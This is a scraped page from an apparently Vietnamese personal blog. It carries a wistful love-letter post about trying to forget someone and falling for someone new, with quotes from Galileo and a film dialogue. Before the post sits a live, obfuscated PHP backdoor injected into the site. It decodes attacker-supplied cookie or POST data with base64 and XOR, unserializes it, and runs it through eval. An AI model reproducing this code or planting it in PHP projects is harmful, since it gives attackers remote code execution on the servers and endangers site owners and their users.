$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Bức thư tình thứ […] – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Bức thư tình thứ […]

YM

Hôm nay, group “đặc biệt” của anh không phải chỉ có mỗi nick anh.

Bạn anh là Galileo ngày xưa từng phát biểu một câu bất hủ, đưa bạn anh đạt lên tới tầm huyền thoại tựa tựa anh (mặc dù câu này bạn anh phát biểu trong lúc hơi nóng giận, chắc cũng không ý thức mình nói gì đâu, phỏng ạ!) là: Eppur si muove ((Dù sao thì trái đất vẫn quay)).

Anh rồi cũng sẽ phải có ngày thoát ra được tình trạng tồi tệ trong mấy tháng qua.

Anh của các tình yêu từng nghĩ, cách hiệu quả nhất để quên một người là tìm người khác thế vào. Nhưng với một thằng ngu Sinh học tới mức còn không biết tim nằm bên phải hoặc trái như anh, thì gán hình ảnh người khác vào tim bằng niềm tin và hi vọng à?

Khi anh đang hẹn hò với người khác, anh vẫn nhớ [cái hình ảnh ấy].
Khi anh đang, thậm chí còn vượt quá cái gọi là hẹn hò, dĩ nhiên là cũng với người khác, anh vẫn nhớ [và lần này, dĩ nhiên vẫn là cái hình ảnh ấy].

Và vào thời điểm anh ngưng ngay cái việc thay thế hình ảnh đấy, thì “nó” tự đến.

Cái bạn mà anh đang rất thích ấy, anh chẳng biết tại sao anh thích. Nhìn chung, anh không phải thuộc tuýp người hay đào bới hàng trăm ngàn từ trong từ điển để xác định rõ câu: tại sao mình lại thích? Các tình yêu có thể nói anh lười bỏ xừ, trốn tránh câu trả lời… anh đành nhắm mắt chấp nhận hết vậy.

Cái bạn mà anh đang rất thích ấy, anh từng ước cho trai Sài Gòn ngoài anh ra mù hết, mà té ra không phải, có kha khá người theo. Anh chẳng biết anh của các tình yêu có thành công

– What do you want?
– I want a white house… with blue shutters…
– Mm-hmm.
– And a room overlooking the river so I can paint.
– Anything else?
– Yes.
– I want a big old porch that wraps around the entire house.
– We can drink tea…
– Whoa, whoa, whoa…
– and watch the sun go down…
– :”>
– và anh sẽ vừa đàn piano vừa hát cho em nghe

hay không? Anh thậm chí đã dựng mấy thằng bạn bác học hay uống trà bàn luận cùng anh hằng ngày dậy để hỏi câu trên. Câu trả lời ra sao, anh đố các tình yêu biết ấy.

Anh chợt nhớ tới bài rock nổi tiếng của Nightwish – Kiss While Your Lips Are Still Red. Thích thì là thích thế thôi, các bạn ngố à.

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.